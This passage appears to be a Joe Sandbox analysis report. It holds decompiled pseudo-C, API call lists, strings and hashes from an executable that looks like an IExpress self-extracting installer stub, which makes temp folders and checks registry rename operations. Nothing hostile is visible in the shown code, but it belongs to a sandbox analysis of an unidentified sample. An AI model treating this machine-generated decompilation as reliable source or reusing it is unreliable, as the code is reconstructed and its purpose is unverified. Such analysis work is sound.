                                                                        																					_t59 = E003D5467(0x3d91e4, 1, 0);
                                                                        																					__eflags = _t59;
                                                                        																					if(_t59 != 0) {
                                                                        																						goto L45;
                                                                        																					} else {
                                                                        																						_t60 = _v268;
                                                                        																						goto L42;
                                                                        																					}
                                                                        																				} else {
                                                                        																					_t60 = _v268 + 1;
                                                                        																					_v265 = 0;
                                                                        																					_v268 = _t60;
                                                                        																					goto L42;
                                                                        																				}
                                                                        																			} else {
                                                                        																				_t65 = E003D2630(0,  &_v268, 1);
                                                                        																				__eflags = _t65;
                                                                        																				if(_t65 != 0) {
                                                                        																					goto L28;
                                                                        																				} else {
                                                                        																					_t67 = E003D597D( &_v268, 1, 1, 0);
                                                                        																					__eflags = _t67;
                                                                        																					if(_t67 == 0) {
                                                                        																						goto L28;
                                                                        																					} else {
                                                                        																						goto L33;
                                                                        																					}
                                                                        																				}
                                                                        																			}
                                                                        																		} else {
                                                                        																			goto L28;
                                                                        																		}
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													} else {
                                                                        														goto L22;
                                                                        													}
                                                                        												}
                                                                        												goto L47;
                                                                        												L42:
                                                                        												__eflags = _t60 - 0x5a;
                                                                        											} while (_t60 <= 0x5a);
                                                                        										}
                                                                        										goto L43;
                                                                        									} else {
                                                                        										_t101 = 1;
                                                                        										_t69 = E003D5467(0x3d91e4, 1, 3); // executed
                                                                        										__eflags = _t69;
                                                                        										if(_t69 != 0) {
                                                                        											goto L45;
                                                                        										} else {
                                                                        											_t82 = 0x3d91e4;
                                                                        											_t70 = E003D2630(0, 0x3d91e4, 1);
                                                                        											__eflags = _t70;
                                                                        											if(_t70 != 0) {
                                                                        												goto L19;
                                                                        											} else {
                                                                        												_t101 = 1;
                                                                        												_t82 = 0x3d91e4;
                                                                        												_t71 = E003D5467(0x3d91e4, 1, 1);
                                                                        												__eflags = _t71;
                                                                        												if(_t71 != 0) {
                                                                        													goto L45;
                                                                        												} else {
                                                                        													do {
                                                                        														goto L19;
                                                                        														L43:
                                                                        														GetWindowsDirectoryA( &_v268, 0x104);
                                                                        														_push(4);
                                                                        														_t101 = 3;
                                                                        														_t82 =  &_v268;
                                                                        														_t44 = E003D597D(_t82, _t101, 1);
                                                                        														__eflags = _t44;
                                                                        													} while (_t44 != 0);
                                                                        													goto L2;
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							__eflags = _t35 - 0x5c;
                                                                        							if(_t35 != 0x5c) {
                                                                        								L10:
                                                                        								_t72 = 1;
                                                                        							} else {
                                                                        								__eflags =  *0x3d8b3f - _t35; // 0x0
                                                                        								_t72 = 0;
                                                                        								if(__eflags != 0) {
                                                                        									goto L10;
                                                                        								}
                                                                        							}
                                                                        							_t101 = 0;
                                                                        							_t73 = E003D5467(0x3d8b3e, 0, _t72);
                                                                        							__eflags = _t73;
                                                                        							if(_t73 != 0) {
                                                                        								L45:
                                                                        								_t38 = 1;
                                                                        							} else {
                                                                        								_t101 = 0x4be;
                                                                        								E003D44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                        								goto L2;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t101 = 0x4b1;
                                                                        						E003D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        						LocalFree(_t109);
                                                                        						 *0x3d9124 = 0x80070714;
                                                                        						goto L2;
                                                                        					}
                                                                        				} else {
                                                                        					_t101 = 0x4b5;
                                                                        					E003D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        					 *0x3d9124 = E003D6285();
                                                                        					L2:
                                                                        					_t38 = 0;
                                                                        				}
                                                                        				L47:
                                                                        				return E003D6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                        			}





































                                                                        0x003d55ab
                                                                        0x003d55b2
                                                                        0x003d55c9
                                                                        0x003d55d5
                                                                        0x003d55d9
                                                                        0x003d5600
                                                                        0x003d5605
                                                                        0x003d560a
                                                                        0x003d560c
                                                                        0x003d5638
                                                                        0x003d5641
                                                                        0x003d5643
                                                                        0x003d5645
                                                                        0x003d5645
                                                                        0x003d564c
                                                                        0x003d5652
                                                                        0x003d5657
                                                                        0x003d5659
                                                                        0x003d5696
                                                                        0x003d569c
                                                                        0x003d589f
                                                                        0x003d58a7
                                                                        0x003d58ac
                                                                        0x003d58b3
                                                                        0x003d58b5
                                                                        0x003d56a2
                                                                        0x003d56a2
                                                                        0x003d56a8
                                                                        0x00000000
                                                                        0x003d56ae
                                                                        0x003d56ae
                                                                        0x003d56b9
                                                                        0x003d56bf
                                                                        0x003d56c1
                                                                        0x003d56f3
                                                                        0x003d56f3
                                                                        0x003d5705
                                                                        0x003d570a
                                                                        0x003d5711
                                                                        0x003d5717
                                                                        0x003d5724
                                                                        0x003d5726
                                                                        0x003d5729
                                                                        0x003d5730
                                                                        0x003d5737
                                                                        0x003d573d
                                                                        0x003d5740
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d572b
                                                                        0x003d572b
                                                                        0x003d572e
                                                                        0x003d5742
                                                                        0x003d5742
                                                                        0x003d5745
                                                                        0x003d576b
                                                                        0x003d576b
                                                                        0x00000000
                                                                        0x003d5747
                                                                        0x003d5747
                                                                        0x003d574d
                                                                        0x003d574f
                                                                        0x003d5771
                                                                        0x003d5771
                                                                        0x003d5773
                                                                        0x00000000
                                                                        0x003d5751
                                                                        0x003d5751
                                                                        0x003d5753
                                                                        0x00000000
                                                                        0x003d5755
                                                                        0x003d575b
                                                                        0x003d5760
                                                                        0x003d5762
                                                                        0x00000000
                                                                        0x003d5764
                                                                        0x003d5764
                                                                        0x003d5769
                                                                        0x003d577e
                                                                        0x003d577e
                                                                        0x003d5781
                                                                        0x003d5788
                                                                        0x003d578d
                                                                        0x003d578f
                                                                        0x003d57b2
                                                                        0x003d57b8
                                                                        0x003d57bd
                                                                        0x003d57bf
                                                                        0x003d57cd
                                                                        0x003d57cd
                                                                        0x003d57dd
                                                                        0x003d57e3
                                                                        0x003d57ef
                                                                        0x003d57f5
                                                                        0x003d57f8
                                                                        0x003d580a
                                                                        0x003d580a
                                                                        0x003d57fa
                                                                        0x003d5802
                                                                        0x003d5802
                                                                        0x003d580d
                                                                        0x003d580f
                                                                        0x003d5830
                                                                        0x003d5836
                                                                        0x003d583d
                                                                        0x003d584b
                                                                        0x003d5851
                                                                        0x003d5855
                                                                        0x003d585a
                                                                        0x003d585c
                                                                        0x00000000
                                                                        0x003d585e
                                                                        0x003d585e
                                                                        0x00000000
                                                                        0x003d585e
                                                                        0x003d5811
                                                                        0x003d5817
                                                                        0x003d5819
                                                                        0x003d581f
                                                                        0x00000000
                                                                        0x003d581f
                                                                        0x003d5791
                                                                        0x003d5797
                                                                        0x003d579c
                                                                        0x003d579e
                                                                        0x00000000
                                                                        0x003d57a0
                                                                        0x003d57a9
                                                                        0x003d57ae
                                                                        0x003d57b0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d57b0
                                                                        0x003d579e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d5769
                                                                        0x003d5762
                                                                        0x003d5753
                                                                        0x003d574f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d572e
                                                                        0x00000000
                                                                        0x003d5864
                                                                        0x003d5864
                                                                        0x003d5864
                                                                        0x003d5717
                                                                        0x00000000
                                                                        0x003d56c3
                                                                        0x003d56c5
                                                                        0x003d56c9
                                                                        0x003d56ce
                                                                        0x003d56d0
                                                                        0x00000000
                                                                        0x003d56d6
                                                                        0x003d56d6
                                                                        0x003d56d8
                                                                        0x003d56dd
                                                                        0x003d56df
                                                                        0x00000000
                                                                        0x003d56e1
                                                                        0x003d56e2
                                                                        0x003d56e4
                                                                        0x003d56e6
                                                                        0x003d56eb
                                                                        0x003d56ed
                                                                        0x00000000
                                                                        0x003d56f3
                                                                        0x003d56f3
                                                                        0x00000000
                                                                        0x003d586c
                                                                        0x003d5878
                                                                        0x003d587e
                                                                        0x003d5882
                                                                        0x003d5883
                                                                        0x003d5889
                                                                        0x003d588e
                                                                        0x003d588e
                                                                        0x00000000
                                                                        0x003d5896
                                                                        0x003d56ed
                                                                        0x003d56df
                                                                        0x003d56d0
                                                                        0x003d56c1
                                                                        0x003d56a8
                                                                        0x003d565b
                                                                        0x003d565b
                                                                        0x003d565d
                                                                        0x003d5669
                                                                        0x003d5669
                                                                        0x003d565f
                                                                        0x003d565f
                                                                        0x003d5665
                                                                        0x003d5667
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d5667
                                                                        0x003d566c
                                                                        0x003d5673
                                                                        0x003d5678
                                                                        0x003d567a
                                                                        0x003d589b
                                                                        0x003d589b
                                                                        0x003d5680
                                                                        0x003d5685
                                                                        0x003d568c
                                                                        0x00000000
                                                                        0x003d568c
                                                                        0x003d567a
                                                                        0x003d560e
                                                                        0x003d5613
                                                                        0x003d561a
                                                                        0x003d5620
                                                                        0x003d5626
                                                                        0x00000000
                                                                        0x003d5626
                                                                        0x003d55db
                                                                        0x003d55e0
                                                                        0x003d55e7
                                                                        0x003d55f1
                                                                        0x003d55f6
                                                                        0x003d55f6
                                                                        0x003d55f6
                                                                        0x003d58b7
                                                                        0x003d58c7

                                                                        APIs
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46A0
                                                                          • Part of subcall function 003D468F: SizeofResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46A9
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46C3
                                                                          • Part of subcall function 003D468F: LoadResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46CC
                                                                          • Part of subcall function 003D468F: LockResource.KERNEL32(00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46D3
                                                                          • Part of subcall function 003D468F: memcpy_s.MSVCRT ref: 003D46E5
                                                                          • Part of subcall function 003D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 003D55CF
                                                                        • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 003D5638
                                                                        • LocalFree.KERNEL32(00000000), ref: 003D564C
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 003D5620
                                                                          • Part of subcall function 003D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003D4518
                                                                          • Part of subcall function 003D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 003D4554
                                                                          • Part of subcall function 003D6285: GetLastError.KERNEL32(003D5BBC), ref: 003D6285
                                                                        • GetTempPathA.KERNEL32(00000104,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 003D56B9
                                                                        • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 003D571E
                                                                        • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 003D5737
                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 003D57CD
                                                                        • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 003D57EF
                                                                        • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 003D5802
                                                                          • Part of subcall function 003D2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 003D2654
                                                                        • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 003D5830
                                                                          • Part of subcall function 003D6517: FindResourceA.KERNEL32(003D0000,000007D6,00000005), ref: 003D652A
                                                                          • Part of subcall function 003D6517: LoadResource.KERNEL32(003D0000,00000000,?,?,003D2EE8,00000000,003D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 003D6538
                                                                          • Part of subcall function 003D6517: DialogBoxIndirectParamA.USER32(003D0000,00000000,00000547,003D19E0,00000000), ref: 003D6557
                                                                          • Part of subcall function 003D6517: FreeResource.KERNEL32(00000000,?,?,003D2EE8,00000000,003D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 003D6560
                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 003D5878
                                                                          • Part of subcall function 003D597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003D59A8
                                                                          • Part of subcall function 003D597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 003D59AF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                        • String ID: <None>$A:\$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                        • API String ID: 2436801531-1216675450
                                                                        • Opcode ID: cacdbdfd6e97ea6c75d899cdb46b8e08cc492280c182c722b8a5937ac8980381
                                                                        • Instruction ID: a3cfd5134be117246092717831bb71b3aab480800f5348bd979b6d5a25f9deb7
                                                                        • Opcode Fuzzy Hash: cacdbdfd6e97ea6c75d899cdb46b8e08cc492280c182c722b8a5937ac8980381
                                                                        • Instruction Fuzzy Hash: 97814AB3B05A149BDB23AB71BD81BEA736D9B61300F1400A7F586D6390DF70CEC18A11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 95%
                                                                        			E003D53A1(CHAR* __ecx, CHAR* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t5;
                                                                        				long _t13;
                                                                        				int _t14;
                                                                        				CHAR* _t20;
                                                                        				int _t29;
                                                                        				int _t30;
                                                                        				CHAR* _t32;
                                                                        				signed int _t33;
                                                                        				void* _t34;
                                                                        
                                                                        				_t5 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t5 ^ _t33;
                                                                        				_t32 = __edx;
                                                                        				_t20 = __ecx;
                                                                        				_t29 = 0;
                                                                        				while(1) {
                                                                        					E003D171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                        					_t34 = _t34 + 0x10;
                                                                        					_t29 = _t29 + 1;
                                                                        					E003D1680(_t32, 0x104, _t20);
                                                                        					E003D658A(_t32, 0x104,  &_v268); // executed
                                                                        					RemoveDirectoryA(_t32); // executed
                                                                        					_t13 = GetFileAttributesA(_t32); // executed
                                                                        					if(_t13 == 0xffffffff) {
                                                                        						break;
                                                                        					}
                                                                        					if(_t29 < 0x190) {
                                                                        						continue;
                                                                        					}
                                                                        					L3:
                                                                        					_t30 = 0;
                                                                        					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                        						_t30 = 1;
                                                                        						DeleteFileA(_t32);
                                                                        						CreateDirectoryA(_t32, 0);
                                                                        					}
                                                                        					L5:
                                                                        					return E003D6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                        				}
                                                                        				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                        				if(_t14 == 0) {
                                                                        					goto L3;
                                                                        				}
                                                                        				_t30 = 1;
                                                                        				 *0x3d8a20 = 1;
                                                                        				goto L5;
                                                                        			}

















                                                                        0x003d53ac
                                                                        0x003d53b3
                                                                        0x003d53b9
                                                                        0x003d53bb
                                                                        0x003d53bd
                                                                        0x003d53bf
                                                                        0x003d53d1
                                                                        0x003d53d6
                                                                        0x003d53e0
                                                                        0x003d53e2
                                                                        0x003d53f5
                                                                        0x003d53fb
                                                                        0x003d5402
                                                                        0x003d540b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d5413
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d5415
                                                                        0x003d5416
                                                                        0x003d5427
                                                                        0x003d542a
                                                                        0x003d542b
                                                                        0x003d5434
                                                                        0x003d5434
                                                                        0x003d543a
                                                                        0x003d544c
                                                                        0x003d544c
                                                                        0x003d5452
                                                                        0x003d545a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d545e
                                                                        0x003d545f
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 003D171E: _vsnprintf.MSVCRT ref: 003D1750
                                                                        • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D53FB
                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D5402
                                                                        • GetTempFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D541F
                                                                        • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D542B
                                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D5434
                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D5452
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                        • API String ID: 1082909758-1581276140
                                                                        • Opcode ID: 32339723b6d1e3156cb9c51749addc5a6e660e8eba97c7a9cfc786654cd7fa64
                                                                        • Instruction ID: 422a6183ae3cf963cb6e7381dbffd5166f47de3b915633e509890251fa7d9518
                                                                        • Opcode Fuzzy Hash: 32339723b6d1e3156cb9c51749addc5a6e660e8eba97c7a9cfc786654cd7fa64
                                                                        • Instruction Fuzzy Hash: 9C11B27270291477D323AB26BD49FAF776DEFC5711F000127F556D2290CE74898686A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 519 3d256d-3d257d 520 3d2583-3d2589 519->520 521 3d2622-3d2627 call 3d24e0 519->521 522 3d25e8-3d2607 RegOpenKeyExA 520->522 523 3d258b 520->523 525 3d2629-3d262f 521->525 527 3d2609-3d2620 RegQueryInfoKeyA 522->527 528 3d25e3-3d25e6 522->528 523->525 526 3d2591-3d2595 523->526 526->525 530 3d259b-3d25ba RegOpenKeyExA 526->530 531 3d25d1-3d25dd RegCloseKey 527->531 528->525 530->528 532 3d25bc-3d25cb RegQueryValueExA 530->532 531->528 532->531
                                                                        C-Code - Quality: 86%
                                                                        			E003D256D(signed int __ecx) {
                                                                        				int _v8;
                                                                        				void* _v12;
                                                                        				signed int _t13;
                                                                        				signed int _t19;
                                                                        				long _t24;
                                                                        				void* _t26;
                                                                        				int _t31;
                                                                        				void* _t34;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_push(__ecx);
                                                                        				_t13 = __ecx & 0x0000ffff;
                                                                        				_t31 = 0;
                                                                        				if(_t13 == 0) {
                                                                        					_t31 = E003D24E0(_t26);
                                                                        				} else {
                                                                        					_t34 = _t13 - 1;
                                                                        					if(_t34 == 0) {
                                                                        						_v8 = 0;
                                                                        						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                        							goto L7;
                                                                        						} else {
                                                                        							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                        							goto L6;
                                                                        						}
                                                                        						L12:
                                                                        					} else {
                                                                        						if(_t34 > 0 && __ecx <= 3) {
                                                                        							_v8 = 0;
                                                                        							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                        							if(_t24 == 0) {
                                                                        								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                        								L6:
                                                                        								asm("sbb eax, eax");
                                                                        								_v8 = _v8 &  !( ~_t19);
                                                                        								RegCloseKey(_v12); // executed
                                                                        							}
                                                                        							L7:
                                                                        							_t31 = _v8;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t31;
                                                                        				goto L12;
                                                                        			}











                                                                        0x003d2572
                                                                        0x003d2573
                                                                        0x003d2575
                                                                        0x003d2578
                                                                        0x003d257d
                                                                        0x003d2627
                                                                        0x003d2583
                                                                        0x003d2586
                                                                        0x003d2589
                                                                        0x003d25eb
                                                                        0x003d2607
                                                                        0x00000000
                                                                        0x003d2609
                                                                        0x003d261a
                                                                        0x00000000
                                                                        0x003d261a
                                                                        0x00000000
                                                                        0x003d258b
                                                                        0x003d258b
                                                                        0x003d259e
                                                                        0x003d25b2
                                                                        0x003d25ba
                                                                        0x003d25cb
                                                                        0x003d25d1
                                                                        0x003d25d6
                                                                        0x003d25da
                                                                        0x003d25dd
                                                                        0x003d25dd
                                                                        0x003d25e3
                                                                        0x003d25e3
                                                                        0x003d25e3
                                                                        0x003d258b
                                                                        0x003d2589
                                                                        0x003d262f
                                                                        0x00000000

                                                                        APIs
                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,003D4096,003D4096,?,003D1ED3,00000001,00000000,?,?,003D4137,?), ref: 003D25B2
                                                                        • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,003D4096,?,003D1ED3,00000001,00000000,?,?,003D4137,?,003D4096), ref: 003D25CB
                                                                        • RegCloseKey.KERNELBASE(?,?,003D1ED3,00000001,00000000,?,?,003D4137,?,003D4096), ref: 003D25DD
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,003D4096,003D4096,?,003D1ED3,00000001,00000000,?,?,003D4137,?), ref: 003D25FF
                                                                        • RegQueryInfoKeyA.ADVAPI32 ref: 003D261A
                                                                        Strings
                                                                        • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 003D25F5
                                                                        • PendingFileRenameOperations, xrefs: 003D25C3
                                                                        • System\CurrentControlSet\Control\Session Manager, xrefs: 003D25A8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: OpenQuery$CloseInfoValue
                                                                        • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                        • API String ID: 2209512893-559176071
                                                                        • Opcode ID: 9a9d770ba307db3c4c4d22503989c526c1fa635b7bdd3e5f56a45039f6936ffb
                                                                        • Instruction ID: 64e6e2169fcfe3fd396d0e46f36a8e5ba02fa93f2b9d59ab64ebb78d71f31fab
                                                                        • Opcode Fuzzy Hash: 9a9d770ba307db3c4c4d22503989c526c1fa635b7bdd3e5f56a45039f6936ffb
                                                                        • Instruction Fuzzy Hash: 3F115836942228BB9B229B92BD09DFFBF7CDF557A1F104057F808E2250D6709F44E6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 533 3d6a60-3d6a91 call 3d7155 call 3d7208 GetStartupInfoW 539 3d6a93-3d6aa2 533->539 540 3d6abc-3d6abe 539->540 541 3d6aa4-3d6aa6 539->541 542 3d6abf-3d6ac5 540->542 543 3d6aaf-3d6aba Sleep 541->543 544 3d6aa8-3d6aad 541->544 545 3d6ac7-3d6acf _amsg_exit 542->545 546 3d6ad1-3d6ad7 542->546 543->539 544->542 547 3d6b0b-3d6b11 545->547 548 3d6ad9-3d6ae9 call 3d6c3f 546->548 549 3d6b05 546->549 551 3d6b2e-3d6b30 547->551 552 3d6b13-3d6b24 _initterm 547->552 553 3d6aee-3d6af2 548->553 549->547 554 3d6b3b-3d6b42 551->554 555 3d6b32-3d6b39 551->555 552->551 553->547 556 3d6af4-3d6b00 553->556 557 3d6b44-3d6b51 call 3d7060 554->557 558 3d6b67-3d6b71 554->558 555->554 560 3d6c39-3d6c3e call 3d724d 556->560 557->558 567 3d6b53-3d6b65 557->567 559 3d6b74-3d6b79 558->559 564 3d6b7b-3d6b7d 559->564 565 3d6bc5-3d6bc8 559->565 570 3d6b7f-3d6b81 564->570 571 3d6b94-3d6b98 564->571 568 3d6bca-3d6bd3 565->568 569 3d6bd6-3d6be3 _ismbblead 565->569 567->558 568->569 572 3d6be9-3d6bed 569->572 573 3d6be5-3d6be6 569->573 570->565 574 3d6b83-3d6b85 570->574 575 3d6b9a-3d6b9e 571->575 576 3d6ba0-3d6ba2 571->576 572->559 578 3d6c1e-3d6c25 572->578 573->572 574->571 579 3d6b87-3d6b8a 574->579 580 3d6ba3-3d6bbc call 3d2bfb 575->580 576->580 583 3d6c27-3d6c2d _cexit 578->583 584 3d6c32 578->584 579->571 582 3d6b8c-3d6b92 579->582 580->578 586 3d6bbe-3d6bbf exit 580->586 582->574 583->584 584->560 586->565
                                                                        C-Code - Quality: 51%
                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				signed int* _t25;
                                                                        				signed int _t26;
                                                                        				signed int _t29;
                                                                        				int _t30;
                                                                        				signed int _t37;
                                                                        				signed char _t41;
                                                                        				signed int _t53;
                                                                        				signed int _t54;
                                                                        				intOrPtr _t56;
                                                                        				signed int _t58;
                                                                        				signed int _t59;
                                                                        				intOrPtr* _t60;
                                                                        				void* _t62;
                                                                        				void* _t67;
                                                                        				void* _t68;
                                                                        
                                                                        				E003D7155();
                                                                        				_push(0x58);
                                                                        				_push(0x3d72b8);
                                                                        				E003D7208(__ebx, __edi, __esi);
                                                                        				 *(_t62 - 0x20) = 0;
                                                                        				GetStartupInfoW(_t62 - 0x68);
                                                                        				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                        				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                        				_t53 = 0;
                                                                        				while(1) {
                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                        					if(0 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(0 != _t56) {
                                                                        						Sleep(0x3e8);
                                                                        						continue;
                                                                        					} else {
                                                                        						_t58 = 1;
                                                                        						_t53 = 1;
                                                                        					}
                                                                        					L7:
                                                                        					_t67 =  *0x3d88b0 - _t58; // 0x2
                                                                        					if(_t67 != 0) {
                                                                        						__eflags =  *0x3d88b0; // 0x2
                                                                        						if(__eflags != 0) {
                                                                        							 *0x3d81e4 = _t58;
                                                                        							goto L13;
                                                                        						} else {
                                                                        							 *0x3d88b0 = _t58;
                                                                        							_t37 = E003D6C3F(0x3d10b8, 0x3d10c4); // executed
                                                                        							__eflags = _t37;
                                                                        							if(__eflags == 0) {
                                                                        								goto L13;
                                                                        							} else {
                                                                        								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                        								_t30 = 0xff;
                                                                        							}
                                                                        						}
